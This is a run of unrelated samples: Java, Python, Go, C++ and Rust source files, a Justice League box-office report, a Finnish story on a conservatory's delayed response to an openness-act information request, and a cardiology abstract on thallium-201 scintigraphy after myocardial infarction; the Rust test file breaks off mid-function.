Collections.sort(artifactIds);
return artifactIds;
}
} |
/**
* This class is designed to hold the data to be plotted.
* It is to be used in conjunction with the Graph2D class and Axis
* class for plotting 2D graphs.
*
* @version $Revision: 1.4 $, $Date: 2006/01/19 14:45:51 $
* @author Leigh Brookshaw
*/
public class DataSet extends Object {
/*
***************************
** Public Static Values
**************************/
/**
* A constant value flag used to specify no straight line segment
* is to join the data points
*/
public final static int NOLINE = 0;
/**
* A constant value flag used to specify that a straight line segment
* is to join the data points.
*/
public final static int LINE = 1;
/* public static boolean macosx = false;
static {
String osName = System.getProperty("os.name");
if (osName.toLowerCase().startsWith("mac os x"))
macosx = true;
}*/
/*
***********************
** Public Variables
**********************/
/**
* The Graphics canvas that is driving the whole show.
* @see it.unitn.ing.jgraph.Graph2D
*/
public Graph2D g2d;
/**
* The linestyle to employ when joining the data points with
* straight line segments. Currently only solid and no line
* are supported.
*/
public int linestyle = LINE;
/**
* The color of the straight line segments
*/
public Color linecolor = null;
/**
* The index of the marker to use at the data points.
* @see it.unitn.ing.jgraph.Markers
*/
public int marker = 0;
/**
* The marker color
*/
public Color markercolor = null;
/**
* The scaling factor for the marker. Default value is 1.
*/
public double markerscale = 1.0;
/**
* The Axis object the X data is attached to. From the Axis object
* the scaling for the data can be derived.
* @see it.unitn.ing.jgraph.Axis
*/
public Axis xaxis;
/**
* The Axis object the Y data is attached to.
* @see it.unitn.ing.jgraph.Axis
*/
public Axis yaxis;
/**
* The current plottable X maximum of the data.
* This can be very different from
* true data X maximum. The data is clipped when plotted.
*/
public double xmax;
/**
* The current plottable X minimum of the data.
* This can be very different from
* true data X minimum. The data is clipped when plotted.
*/
public double xmin;
/**
* The current plottable Y maximum of the data.
* This can be very different from
* true data Y maximum. The data is clipped when plotted.
*/
public double ymax;
/**
* The current plottable Y minimum of the data.
* This can be very different from
* true data Y minimum. The data is clipped when plotted.
*/
public double ymin;
/**
* Boolean to control clipping of the data window.
* Default value is <em>true</em>, clip the data window.
*/
public boolean clipping = true;
/*
*********************
** Protected Variables
**********************/
/**
* The data X maximum.
* Once the data is loaded this will never change.
*/
protected double dxmax;
/**
* The data X minimum.
* Once the data is loaded this will never change.
*/
protected double dxmin;
/**
* The data Y maximum.
* Once the data is loaded this will never change.
*/
protected double dymax;
/**
* The data Y minimum.
* Once the data is loaded this will never change.
*/
protected double dymin;
/**
* The array containing the actual data
*/
protected double data[];
/**
* The color map containing the actual data colors
*/
protected ThermalColorMap color_map = null;
protected double color_data[];
/**
* The number of data points stored in the data array
*/
protected int length;
/**
* The X range of the clipped data
*/
protected double xrange;
/**
* The Y range of the clipped data
*/
protected double yrange;
/**
* The length of the example line in the data legend.
*/
protected int legend_length = 20;
/**
* The legend text
*/
protected TextLine legend_text = null;
/**
* The X pixel position of the data legend
*/
protected int legend_ix;
/**
* The Y pixel position of the data legend
*/
protected int legend_iy;
/**
* The X data position of the data legend
*/
protected double legend_dx;
/**
* The Y data position of the data legend
*/
protected double legend_dy;
/**
* The amount to increment the data array when the append method is being
* used.
*/
protected int increment = 100;
/**
* The stride of the data. For data pairs (x,y) the stride is 2
*/
protected int stride = 2;
/*
*********************
** Constructors
********************/
/**
* Instantiate an empty data set.
*/
public DataSet() {
length = 0;
range(stride);
}
/**
* Instantiate an empty data set.
* @param stride the stride of the data set. The default stride is 2.
*/
public DataSet(int stride) throws Exception {
if (stride < 2)
throw
new Exception("Invalid stride parameter!");
this.stride = stride;
length = 0;
range(stride);
}
/**
* Instantiate a DataSet with the parsed data. Default stride is 2.
* The double array contains the data. The X data is expected in
* the even indices, the y data in the odd. The integer n is the
* number of data Points. This means that the length of the data
* array is 2*n.
* @param d Array containing the (x,y) data pairs.
* @param n Number of (x,y) data pairs in the array.
* @exception Exception
* A Generic exception if it fails to load the
* parsed array into the class.
*/
public DataSet(double d[], int n) throws Exception {
int i;
int k = 0;
length = 0;
if (d == null || d.length == 0 || n <= 0) {
throw new Exception("DataSet: Error in parsed data!");
}
// Copy the data locally.
data = new double[n * stride];
length = n * stride;
System.arraycopy(d, 0, data, 0, length);
// Calculate the data range.
range(stride);
}
/**
* Instantiate a DataSet with the parsed data.
* The double array contains the data. The X data is expected to be in
* indices i*stride where i=0,1,... The Y data is expected to be found
* in indices i*stride+1 where i=0,1,2...
* The integer n is the
* number of data Points. This means that the length of the data
* array is 2*stride.
* @param d Array containing the (x,y) data pairs.
* @param n Number of (x,y) data pairs in the array.
* @param s The stride of the data.
* @exception Exception
* A Generic exception if it fails to load the
* parsed array into the class.
*/
public DataSet(double d[], int n, int s) throws Exception {
if (s < 2)
throw
new Exception("Invalid stride parameter!");
int i;
int k = 0;
length = 0;
if (d == null || d.length == 0 || n <= 0) {
throw new Exception("DataSet: Error in parsed data!");
}
this.stride = s;
// Copy the data locally.
data = new double[n * stride];
length = n * stride;
System.arraycopy(d, 0, data, 0, length);
// Calculate the data range.
range(stride);
}
/*
*******************
** Public Methods
******************/
/**
* Append data to the data set.
* @param d Array containing (x,y) pairs to append
* @param n Number of (x,y) data pairs in the array.
* @exception Exception
* A generic exception if it fails to load the
* parsed array into the class.
*/
public void append(double d[], int n) throws Exception {
int i;
int k = 0;
double tmp[];
int ln = n * stride;
if (d == null || d.length == 0 || n <= 0) {
throw new Exception("DataSet: Error in append data!");
}
if (data == null) data = new double[increment];
// Copy the data locally.
if (ln + length < data.length) {
System.arraycopy(d, 0, data, length, ln);
length += ln;
} else {
tmp = new double[ln + length + increment];
if (length != 0) {
System.arraycopy(data, 0, tmp, 0, length);
}
System.arraycopy(d, 0, tmp, length, ln);
length += ln;
data = tmp;
}
// Calculate the data range.
range(stride);
// Update the range on Axis that this data is attached to
if (xaxis != null) xaxis.resetRange();
if (yaxis != null) yaxis.resetRange();
}
public void setColorMap(ThermalColorMap map) {
color_map = map;
}
public void setColorData(double[] colors) {
color_data = colors;
}
/**
* Delete data from the data set (start and end are inclusive).
* The first (x,y) pair in the data set start at index 0.
* @param start The start (x,y) pair index.
* @param end The end (x,y) pair index.
*/
public void delete(int start, int end) {
int End = stride * end;
int Start = stride * start;
if (length <= 0) return;
if (End < Start) return;
if (Start < 0) Start = 0;
if (End > length - stride) End = length - stride;
if (End < length - stride) {
System.arraycopy(data, End + stride,
data, Start, length - End - stride);
}
length -= End + stride - Start;
// Calculate the data range.
range(stride);
}
/**
* Delete all the data from the data set.
*/
public void deleteData() {
length = 0;
data = null;
range(stride);
}
/**
* Draw the straight line segments and/or the markers at the
* data points.
* If this data has been attached to an Axis then scale the data
* based on the axis maximum/minimum otherwise scale using
* the data's maximum/minimum
* @param g Graphics state
* @param bounds The data window to draw into
*/
public void draw_data(Graphics g, Rectangle bounds) {
Color c;
if (xaxis != null) {
xmax = xaxis.getMaximum();
xmin = xaxis.getMinimum();
}
if (yaxis != null) {
ymax = yaxis.getMaximum();
ymin = yaxis.getMinimum();
}
xrange = xmax - xmin;
yrange = ymax - ymin;
/*
** draw the legend before we clip the data window
*/
if (clipping) { // && !macosx) {
Shape actualclip = g.getClip();
g.setClip(0, bounds.y, bounds.x, bounds.height);
draw_legend(g, bounds);
g.setClip(actualclip);
} else
draw_legend(g, bounds);
/*
** Clip the data window
*/
if (clipping)
g.clipRect(bounds.x, bounds.y, bounds.width, bounds.height);
c = g.getColor();
if (linestyle != DataSet.NOLINE) {
if (linecolor != null)
g.setColor(linecolor);
else
g.setColor(c);
draw_lines(g, bounds);
}
if (marker > 0) {
if (markercolor != null)
g.setColor(markercolor);
else
g.setColor(c);
draw_markers(g, bounds);
}
g.setColor(c);
}
/**
* return the data X maximum.
*/
public double getXmax() {
return dxmax;
}
/**
* return the data X minimum.
*/
public double getXmin() {
return dxmin;
}
/**
* return the data Y maximum.
*/
public double getYmax() {
return dymax;
}
/**
* return the data Y minimum.
*/
public double getYmin() {
return dymin;
}
/**
* Define a data legend in the graph window
* @param x pixel position of the legend.
* @param y pixel position of the legend.
* @param text text to display in the legend
*/
public void legend(int x, int y, String text) {
if (text == null) {
legend_text = null;
return;
}
if (legend_text == null)
legend_text = new TextLine(text);
else
legend_text.setText(text);
legend_text.setJustification(TextLine.LEFT);
legend_ix = x;
legend_iy = y;
legend_dx = 0.0;
legend_dy = 0.0;
}
/**
* Define a data legend in the graph window
* @param x data position of the legend.
* @param y data position of the legend.
* @param text text to display in the legend
*/
public void legend(double x, double y, String text) {
if (text == null) {
legend_text = null;
return;
}
if (legend_text == null)
legend_text = new TextLine(text);
else
legend_text.setText(text);
legend_text.setJustification(TextLine.LEFT);
legend_dx = x;
legend_dy = y;
legend_ix = 0;
legend_iy = 0;
}
/**
* Set the font to be used in the legend
* @param f font
*/
public void legendFont(Font f) {
if (f == null) return;
if (legend_text == null) legend_text = new TextLine();
legend_text.setFont(f);
}
/**
* Set the color for the legend text
* @param c color
*/
public void legendColor(Color c) {
if (c == null) return;
if (legend_text == null) legend_text = new TextLine();
legend_text.setColor(c);
}
/**
* Return the number of data points in the DataSet
* @return number of (x,y0 points.
*/
public int dataPoints() {
return length / stride;
}
/**
* get the data point at the parsed index. The first (x,y) pair
* is at index 0.
* @param index Data point index
* @return array containing the (x,y) pair.
*/
public double[] getPoint(int index) {
double point[] = new double[stride];
int i = index * stride;
if (index < 0 || i > length - stride) return null;
for (int j = 0; j < stride; j++) point[j] = data[i + j];
return point;
}
/**
* Return the data point that is closest to the parsed (x,y) position
* @param x
* @param y (x,y) position in data space.
* @return array containing the closest data point.
*/
public double[] getClosestPoint(double x, double y) {
double point[] = {0.0, 0.0, 0.0};
int i;
double xdiff, ydiff, dist2;
xdiff = data[0] - x;
ydiff = data[1] - y;
point[0] = data[0];
point[1] = data[1];
point[2] = xdiff * xdiff + ydiff * ydiff;
for (i = stride; i < length - 1; i += stride) {
xdiff = data[i] - x;
ydiff = data[i + 1] - y;
dist2 = xdiff * xdiff + ydiff * ydiff;
if (dist2 < point[2]) {
point[0] = data[i];
point[1] = data[i + 1];
point[2] = dist2;
}
}
//System.out.println("DataSet: closestpoint "+point[0]+", "+point[1]+", "+point[2]);
return point;
}
public double[] getClosestPoint(double x) {
double point[] = {0.0, 0.0, 0.0};
int i;
double xdiff, ydiff, dist2;
xdiff = data[0] - x;
point[0] = data[0];
point[1] = data[1];
point[2] = xdiff * xdiff;
for (i = stride; i < length - 1; i += stride) {
xdiff = data[i] - x;
dist2 = xdiff * xdiff;
if (dist2 < point[2]) {
point[0] = data[i];
point[1] = data[i + 1];
point[2] = dist2;
}
}
//System.out.println("DataSet: closestpoint "+point[0]+", "+point[1]+", "+point[2]);
return point;
}
/*
*********************
** Protected Methods
*********************/
/**
* Draw into the data window the straight line segments joining the
* data points.
* @param g Graphics context
* @param w Data window
*/
protected void draw_lines(Graphics g, Rectangle w) {
int i;
int j;
boolean inside0 = false;
boolean inside1 = false;
double x,y;
int x0 = 0 , y0 = 0;
int x1 = 0 , y1 = 0;
// Calculate the clipping rectangle
Rectangle clip = g.getClipRect();
int xcmin = clip.x;
int xcmax = clip.x + clip.width;
int ycmin = clip.y;
int ycmax = clip.y + clip.height;
// Is there any data to draw? Sometimes the draw command will
// be called before any data has been placed in the class.
if (data == null || data.length < stride) return;
// System.out.println("Drawing Data Lines!");
// Is the first point inside the drawing region ?
if ((inside0 = inside(data[0], data[1]))) {
x0 = (int) (w.x + ((data[0] - xmin) / xrange) * w.width);
y0 = (int) (w.y + (1.0 - (data[1] - ymin) / yrange) * w.height);
if (x0 < xcmin || x0 > xcmax ||
y0 < ycmin || y0 > ycmax)
inside0 = false;
}
for (i = stride; i < length; i += stride) {
// Is this point inside the drawing region?
inside1 = inside(data[i], data[i + 1]);
// If one point is inside the drawing region calculate the second point
if (inside1 || inside0) {
x1 = (int) (w.x + ((data[i] - xmin) / xrange) * w.width);
y1 = (int) (w.y + (1.0 - (data[i + 1] - ymin) / yrange) * w.height);
if (x1 < xcmin || x1 > xcmax ||
y1 < ycmin || y1 > ycmax)
inside1 = false;
}
// If the second point is inside calculate the first point if it
// was outside
if (!inside0 && inside1) {
x0 = (int) (w.x + ((data[i - stride] - xmin) / xrange) * w.width);
y0 = (int) (w.y + (1.0 - (data[i - stride + 1] - ymin) / yrange) * w.height);
}
// If either point is inside and is a valid data draw the segment
if ((!Double.isNaN(data[i - stride + 1]) && !Double.isNaN(data[i + 1])) && (inside0 || inside1))
g.drawLine(x0, y0, x1, y1);
/*
** The reason for the convolution above is to avoid calculating
** the points over and over. Now just copy the second point to the
** first and grab the next point
*/
inside0 = inside1;
x0 = x1;
y0 = y1;
}
}
/**
* Return true if the point (x,y) is inside the allowed data range.
*/
protected boolean inside(double x, double y) {
if (x >= xmin && x <= xmax &&
y >= ymin && y <= ymax)
return true;
return false;
}
/**
* Draw the markers.
* Only markers inside the specified range will be drawn. Also markers
* close the edge of the clipping region will be clipped.
* @param g Graphics context
* @param w data window
* @see it.unitn.ing.jgraph.Markers
*/
protected void draw_markers(Graphics g, Rectangle w) {
double x1,y1;
int i;
// Calculate the clipping rectangle
Rectangle clip = g.getClipRect();
int xcmin = clip.x;
int xcmax = clip.x + clip.width;
int ycmin = clip.y;
int ycmax = clip.y + clip.height;
/*
** Load the marker specified for this data
*/
Markers m = g2d.getMarkers();
if (m == null) return;
// System.out.println("Drawing Data Markers!");
Color c = null;
if (color_map != null) {
c = g.getColor();
}
for (i = 0; i < length; i += stride) {
if (inside(data[i], data[i + 1])) {
x1 = w.x + ((data[i] - xmin) / xrange) * w.width;
y1 = w.y + (1.0 - (data[i + 1] - ymin) / yrange) * w.height;
if (color_map != null) {
g.setColor(color_map.getColor(color_data[i / 2]));
}
if (x1 >= xcmin && x1 <= xcmax &&
y1 >= ycmin && y1 <= ycmax)
m.draw(g, marker, markerscale, x1, y1);
}
}
if (color_map != null) {
g.setColor(c);
}
}
/**
* Draw a legend for this data set
* @param g Graphics context
* @param w Data Window
*/
protected void draw_legend(Graphics g, Rectangle w) {
Color c = g.getColor();
Markers m = null;
if (legend_text == null) return;
if (legend_text.isNull()) return;
if (legend_dx != 0.0 || legend_ix == 0)
legend_ix = (int) (w.x + ((legend_dx - xmin) / xrange) * w.width);
if (legend_dy != 0.0 || legend_iy == 0)
legend_iy = (int) (w.y + (1.0 - (legend_dy - ymin) / yrange) * w.height);
if (linestyle != DataSet.NOLINE) {
if (linecolor != null) g.setColor(linecolor);
g.drawLine(legend_ix, legend_iy, legend_ix + legend_length, legend_iy);
}
if (marker > 0) {
m = g2d.getMarkers();
if (m != null) {
if (markercolor != null)
g.setColor(markercolor);
else
g.setColor(c);
m.draw(g, marker, 1.0, legend_ix + legend_length / 2, legend_iy);
}
}
legend_text.draw(g,
legend_ix + legend_length + legend_text.charWidth(g, ' '),
legend_iy + legend_text.getAscent(g) / 3);
g.setColor(c);
}
/**
* Calculate the range of the data. This modifies dxmin,dxmax,dymin,dymax
* and xmin,xmax,ymin,ymax
*/
protected void range(int stride) {
int i;
if (length >= stride) {
dxmax = data[0];
dymax = data[1];
dxmin = dxmax;
dymin = dymax;
} else {
dxmin = 0.0;
dxmax = 0.0;
dymin = 0.0;
dymax = 0.0;
}
for (i = stride; i < length; i += stride) {
if (dxmax < data[i]) {
dxmax = data[i];
} else if (dxmin > data[i]) {
dxmin = data[i];
}
if (dymax < data[i + 1]) {
dymax = data[i + 1];
} else if (dymin > data[i + 1]) {
dymin = data[i + 1];
}
}
if (xaxis == null) {
xmin = dxmin;
xmax = dxmax;
}
if (yaxis == null) {
ymin = dymin;
ymax = dymax;
}
}
} |
EXCLUSIVE: Warner Bros./DC’s Justice League made $13M last night per Warner Bros., which is where some of our more aggressive box office analysts saw it. Previews began at 6PM. Last night’s take is higher than the $11M minted by Wonder Woman before earning a $38.2M Friday ($103.3M opening). Based on these estimates, the notion is that Justice League could fly to a $110M-$115M start and a possible $37M-$40M Friday. Already as of Wednesday, Justice League has already collected $8.5M in nine countries, spurred by Brazil, Korea and France. There are 38 more countries opening today.
Recently, Disney/Marvel’s Thor Ragnarok grossed $14.5M off its Thursday night, which repped a little more than a third of its $46.47M Friday before posting a $122.7M three-day. However, critics embraced the Taika Waititi film, giving is one of Marvel’s best reviews ever at 92% certified fresh. Similar to such DC movies as Batman v. Superman: Dawn of Justice (27% Rotten) and Suicide Squad (26% Rotten), critics haven’t been kind to Snyder’s super friends entourage pic, smacking the title with a current 38% Rotten. Wonder Woman’s Thursday night repped about 29% of its Friday, while BvS made $27.7M on its Holy Thursday, which contributed to 34% to its $81.55M Good Friday (opening weekend was $166M).
Justice League‘s Thursday night beats that of Deadpool ($12.7M), Guardians of the Galaxy ($11.2M), and is just $500K shy of what It made for New Line/Warner Bros. on its preview night.
Lionsgate’s feature adaptation of the bestselling YA novel Wonder also previewed last night and earned $740k from 2,400 locations that had showtimes starting at 7PM. That movie was tracking at $9M, moved to $14M, and there’s a very good chance it could well outperform. There’s also Sony Affirm’s animated Biblical film The Star, which opened at 5PM tonight. That pic is pegged at making $10M.
In estimates this morning, Ragnarok led all films in regular release yesterday with $2.4M for a second week’s take of $70.6M and a two-week running cume of $225.6M. This weekend, Ragnarok will easily eclipse the domestic lifetime cume of last year’s Doctor Strange from Marvel, which ended its run at $232.6M. Ragnarok is projected to rake in north of $30M this weekend despite Justice League’s presence in the marketplace.
20th Century Fox’s Murder on the Orient Express drove an estimated $37.9M in its first week with a second-place take yesterday of $1.79M. The Kenneth Branagh-directed title is igniting its older female fanbase and is expected to ease 40% in weekend two for $17.1M. Ten-day total by Sunday should be around $55M. Paramount’s Daddy’s Home 2 made $1.16M yesterday for a week’s estimated tally of $35.8M. The PG-13 family comedy is looking at a 45% dip for $16.3M in weekend two, for a running 10-day total of $52M.
We’ll have more updates for you later. |
import copy


def anonymise(pdf_form_data, label_key):
    """Split PDF form data into (field, value) pairs plus the value of the
    field named by label_key, which is removed from the pairs."""
    pdf_form_data_removedlabel = copy.deepcopy(pdf_form_data)
    pdf_form_data_GENDERlabel = pdf_form_data_removedlabel.pop(label_key, None)
    try:
        pdf_form_data_GENDERlabel = pdf_form_data_GENDERlabel['/V']
        # Keep only the fields that actually carry a non-empty value.
        keyvals_removedlabel = [(k, pdf_form_data_removedlabel[k]['/V'])
                                for k in pdf_form_data_removedlabel.keys()
                                if '/V' in pdf_form_data_removedlabel[k] and
                                pdf_form_data_removedlabel[k]['/V'] != '']
        return (keyvals_removedlabel, pdf_form_data_GENDERlabel)
    except (KeyError, TypeError):
        print("check this PDF doesn't have a '/V' key for the chosen label")
/**
* LogFactory to create log4j compatible QF loggers.
*
* @author Neueda
*/
public class LogAdapterFactory implements LogFactory {
private Level level;
public LogAdapterFactory(Level level) {
this.level = level;
}
@Override
public Log create(SessionID sessionID) {
return new LogAdapter(sessionID.toString(), level);
}
} |
// resize handles user screen/window changes.
func (bb *bbtag) resize() {
x, y, width, height := bb.eng.Size()
bb.eng.Resize(x, y, width, height)
bb.scene.SetPerspective(60, float64(width)/float64(height), 0.1, 50)
} |
#include <bits/stdc++.h>
using namespace std;
int q,x,n;
string s,w;
bool d[1000000],kt;
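// Reconstruct a binary string w from s and x, where s[i] must be '1' iff
// w[i-x] == '1' or w[i+x] == '1' (1-indexed; out-of-range neighbours are
// ignored). d[i] marks positions of w that are already forced; kt is set on
// contradiction, in which case -1 is printed.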
int main() {
ios::sync_with_stdio(false);
cin>>q;
while(q--) {
cin>>s>>x;
n=s.size();
s=' '+s;
w="";
kt=0;
for(int i=1;i<=n;i++) {
w=w+'0';
d[i]=0;
}
w=' '+w;
for(int i=1;i<=n;i++) {
if(s[i]=='0') {
if(i+x<=n) {
if(w[i+x]!='0'&&d[i+x]==1) {
kt=1;break;
}
w[i+x]='0';
d[i+x]=1;
}
if(i-x>0) {
if(w[i-x]!='0'&&d[i-x]==1) {
kt=1;break;
}
w[i-x]='0';
d[i-x]=1;
}
}
else {
if(i-x>0) {
if(d[i-x]==0||w[i-x]=='1') {
d[i-x]=1;
w[i-x]='1';
continue;
}
}
if(i+x>n) {
kt=1;break;
}
if(d[i+x]==1&&w[i+x]!='1') {
kt=1;break;
}
d[i+x]=1;
w[i+x]='1';
}
}
if(kt==1) cout<<"-1\n";
else {
w.erase(0,1);
cout<<w<<'\n';
}
}
}
|
#!/usr/bin/python3
import os
import sys
import shutil
import tempfile
import ply.lex
import ply.yacc

# Minimal dummy lexer/parser: just enough for PLY to generate its tables.
tokens = ['token']
t_token = 'x'

def t_error(t):
    pass

def p_dummy(p):
    'dummy : token'
    pass

def p_error(p):
    pass

def read_tabversion(filename):
    # Execute the generated table module and extract its _tabversion constant.
    data = {}
    with open(filename) as f:
        exec(f.read(), data)
    return data['_tabversion']

tmpdir = tempfile.mkdtemp()
try:
    package = sys.argv[1]
except IndexError:
    raise RuntimeError("ERROR: the package name is required as an argument")
try:
    ply.lex.lex(outputdir=tmpdir, optimize=True)
    ply.yacc.yacc(outputdir=tmpdir, optimize=True, debug=False)
    lex_tabversion = read_tabversion(os.path.join(tmpdir, 'lextab.py'))
    yacc_tabversion = read_tabversion(os.path.join(tmpdir, 'parsetab.py'))
    print('%s-lex-%s, %s-yacc-%s' % (package, lex_tabversion, package,
                                     yacc_tabversion))
finally:
    shutil.rmtree(tmpdir)
|
import time

import networkx as nx


def ReadGraph_Flickr(file_address):
    """Read an edge-list file into a weighted directed graph; repeated
    (u, v) lines increment the edge weight, '#' lines are comments."""
    start = time.time()
    print('Building Flickr graph, beginning at', start, 's')
    G = nx.DiGraph()
    with open(file_address) as f:
        for line in f:
            if line[0] != '#':
                u, v = map(int, line.split())
                try:
                    G[u][v]['weight'] += 1
                except KeyError:
                    G.add_edge(u, v, weight=1)
    print('Built Flickr graph G', time.time() - start, 's')
    return G
FACT BOX
For an article published in Wednesday's issue, Oulu-lehti submitted information requests to several educational institutions operating in Oulu. In general, the information was handed over properly, but the Oulu Conservatory (Oulun konservatorio) stated flatly that the information would take weeks.
"I have forwarded the inquiry to the study counsellor, who is already on summer holiday. They will return from holiday in August and will presumably answer when they have time," the person handling the information request replied by email the day after the request.
Reached on holiday, Oulu Conservatory rector Eero Liimatainen repeats the position taken in that reply. He stresses that the conservatory wants to give out correct information, and that during the study counsellor's holiday only estimates could be provided.
"What is it about this information that it has to be had right now in July? Can't it wait until August?" rector Liimatainen asks.
Under the Openness Act, it cannot. Aleksi Koski of the University of Jyväskylä, who has studied municipalities' problems with information requests, says the explanation given is flimsy.
"The Openness Act does not recognize holidays as a special ground for withholding information. This is an administrative task within the scope of official duty; if it cannot be carried out lawfully, the conduct is improper."
Koski points out that disclosing information is an obligation of the authority, not of an individual office-holder.
"If one person is on holiday or otherwise unavailable, the matter is assigned to another employee of the authority."
After receiving the conservatory's first reply, Oulu-lehti stressed that this was an information request under the Openness Act and that, in light of rulings by the Parliamentary Ombudsman, for example, a shortage of resources does not justify delays beyond the statutory time limits.
"That may well be, but the study counsellor is on holiday and is the only person who can answer the inquiry," the conservatory's reply stated.
In the city's organization, the Oulu Conservatory belongs to the education and culture services. On hearing of the problem with the information request, director of education and culture services Mika Penttilä says that from the standpoint of the Openness Act the matter is clear.
"What happened will be reviewed internally. I am not going to try to explain this away. The law and the Parliamentary Ombudsman's rulings are indisputable, and as a rule we comply with them."
According to researcher Aleksi Koski, the law is, in broad outline, clear about the time limits for disclosing information.
"If the information request is simple, for example a named document, the information should be released without delay. If the information takes some digging up, or there is some comparable reason, two weeks is the maximum time limit."
After Thursday's interview, Oulu Conservatory rector Eero Liimatainen announced by text message that the information would be delivered within the same day. And so it was. Oulu-lehti's information request to the conservatory was sent on 29 June, so the two-week limit was reached on Wednesday.
In particularly difficult and laborious cases the response time may be extended to a month. That can hardly be said of Oulu-lehti's request, which concerned, among other things, the numbers of enrolled students and applicants at the institutions. The response time the conservatory originally indicated would have exceeded even the one-month limit.
The Openness Act, the Act on the Openness of Government Activities, entered into force in 2000. Municipalities have had great difficulty complying with it.
Last autumn the Foundation for Municipal Development (Kunnallisalan kehittämissäätiö) published an extensive study on the subject by University of Jyväskylä researchers Aleksi Koski and Heikki Kuutti. In 2015 the researchers sent an information request to every municipality in mainland Finland. Fully two out of three municipalities had problems answering information requests in the manner required by law.
Oulu came out of that study with credit. Director of education and culture services Mika Penttilä says the Openness Act and the rulings connected with it have been covered in internal training.
"There is, however, probably no written quick-reference guideline on it," he reckons.
Oulu can console itself with the fact that it is not alone with problems tied to holiday seasons.
"In our study of municipalities' problems in answering information requests, we noticed that many municipalities have 'summer shutdowns' for long periods during which nobody answers, even though answering information requests is an administrative task within the scope of official duty," Aleksi Koski says.
Prediction of cardiac events after uncomplicated myocardial infarction: a prospective study comparing predischarge exercise thallium-201 scintigraphy and coronary angiography.
The ability of predischarge quantitative exercise thallium-201 (201Tl) scintigraphy to predict future cardiac events was evaluated prospectively in 140 consecutive patients with uncomplicated acute myocardial infarction; the results were compared with those of submaximal exercise treadmill testing and coronary angiography. High risk was assigned if scintigraphy detected 201Tl defects in more than one discrete vascular region, redistribution, or increased lung uptake, if exercise testing caused ST segment depression greater than or equal to 1 mm or angina or if angiography revealed multivessel disease. Low risk was designated if scintigraphy detected a single-region defect, no redistribution, or no increase in lung uptake, if exercise testing caused no ST segment depression or angina, or if angiography revealed single-vessel disease or no disease. By 15 +/- 12 months, 50 patients had experienced a cardiac event; seven died (five suddenly), nine suffered recurrent myocardial infarction, and 34 developed severe class III or IV angina pectoris. Compared with that of patients at low risk, the cumulative probability of a cardiac event was greater in high-risk patients identified by scintigraphy (p less than .001), exercise testing (p = .011), or angiography (p = .007). Scintigraphy predicted low-risk status better than exercise testing (p = .01) or angiography (p = .05). Each predicted mortality with equal accuracy. However, scintigraphy was more sensitive in detecting patients who experienced reinfarction or who developed class III or IV angina. When all 50 patients with events were combined, scintigraphy identified 47 high-risk patients (94%), whereas exercise-induced ST segment depression or angina detected only 28 (56%) (p less than .001). The presence of multivessel disease as assessed by angiography identified nine more patients with events than exercise testing (p = .06). However, the overall sensitivity of angiography was lower than that of scintigraphy (71% vs 94%; p less than .01) because three patients who experienced reinfarction and 10 who developed class III or IV angina had single-vessel disease. Importantly, 12 (92%) of these 13 patients with single-vessel disease who had an event exhibited redistribution on scintigraphy. These results indicate that (1) submaximal exercise 201Tl scintigraphy can distinguish high- and low-risk groups after uncomplicated acute myocardial infarction before hospital discharge; (2) 201Tl defects in more than one discrete vascular region, presence of delayed redistribution, or increased lung thallium uptake are more sensitive predictors of subsequent cardiac events than ST segment depression, angina, or extent of angiographic disease; and (3) low-risk patients are best identified by a single-region 201Tl defect without redistribution and no increased lung uptake.
#[macro_use]
extern crate lazy_static;
#[macro_use]
extern crate named_type_derive;
#[macro_use]
extern crate derivative;
#[macro_use]
extern crate serde_derive;
#[macro_use]
extern crate serde_json;
extern crate byteorder;
extern crate indyrs as indy;
extern crate indyrs as api;
extern crate ursa;
extern crate uuid;
extern crate named_type;
extern crate rmp_serde;
extern crate rust_base58;
extern crate time;
extern crate serde;
#[macro_use]
mod utils;
use utils::{wallet, did, pool, ledger};
use utils::constants::*;
use utils::types::ResponseType;
use self::indy::ErrorCode;
use api::{INVALID_WALLET_HANDLE, INVALID_POOL_HANDLE};
#[cfg(feature = "local_nodes_pool")]
use std::thread;
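// Fixed byte-array test fixtures: an encrypted message and a signature.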
pub const ENCRYPTED_MESSAGE: &'static [u8; 45] = &[187, 227, 10, 29, 46, 178, 12, 179, 197, 69, 171, 70, 228, 204, 52, 22, 199, 54, 62, 13, 115, 5, 216, 66, 20, 131, 121, 29, 251, 224, 253, 201, 75, 73, 225, 237, 219, 133, 35, 217, 131, 135, 232, 129, 32];
pub const SIGNATURE: &'static [u8; 64] = &[20, 191, 100, 213, 101, 12, 197, 198, 203, 49, 89, 220, 205, 192, 224, 221, 97, 77, 220, 190, 90, 60, 142, 23, 16, 240, 189, 129, 45, 148, 245, 8, 102, 95, 95, 249, 100, 89, 41, 227, 213, 25, 100, 1, 232, 188, 245, 235, 186, 21, 52, 176, 236, 11, 99, 70, 155, 159, 89, 215, 197, 239, 138, 5];
mod high_cases {
use super::*;
mod key_for_did {
use super::*;
#[test]
fn indy_key_for_did_works_for_my_did() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_key_for_did_works_for_my_did");
let (did, verkey) = did::create_and_store_my_did(wallet_handle, Some(MY1_SEED)).unwrap();
let received_verkey = did::key_for_did(-1, wallet_handle, &did).unwrap();
assert_eq!(verkey, received_verkey);
utils::tear_down_with_wallet(wallet_handle, "indy_key_for_did_works_for_my_did", &wallet_config);
}
#[test]
fn indy_key_for_did_works_for_their_did() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_key_for_did_works_for_their_did");
did::store_their_did_from_parts(wallet_handle, DID, VERKEY).unwrap();
let received_verkey = did::key_for_did(-1, wallet_handle, DID).unwrap();
assert_eq!(VERKEY, received_verkey);
utils::tear_down_with_wallet(wallet_handle, "indy_key_for_did_works_for_their_did", &wallet_config);
}
#[test]
fn indy_key_for_did_works_for_get_key_from_ledger() {
let (trustee_wallet_handle, pool_handle, trustee_did, wallet_config) = utils::setup_trustee("indy_key_for_did_works_for_get_key_from_ledger");
let (did, verkey) = did::create_and_store_my_did(trustee_wallet_handle, None).unwrap();
let nym_request = ledger::build_nym_request(&trustee_did, &did, Some(&verkey), None, None).unwrap();
let nym_resp = ledger::sign_and_submit_request(pool_handle, trustee_wallet_handle, &trustee_did, &nym_request).unwrap();
let get_nym_request = ledger::build_get_nym_request(Some(&did), &did).unwrap();
ledger::submit_request_with_retries(pool_handle, &get_nym_request, &nym_resp).unwrap();
wallet::close_wallet(trustee_wallet_handle).unwrap();
wallet::delete_wallet(&wallet_config, WALLET_CREDENTIALS).unwrap();
let (wallet_handle, wallet_config) = wallet::create_and_open_default_wallet("indy_key_for_did_works_for_get_key_from_ledger_2").unwrap();
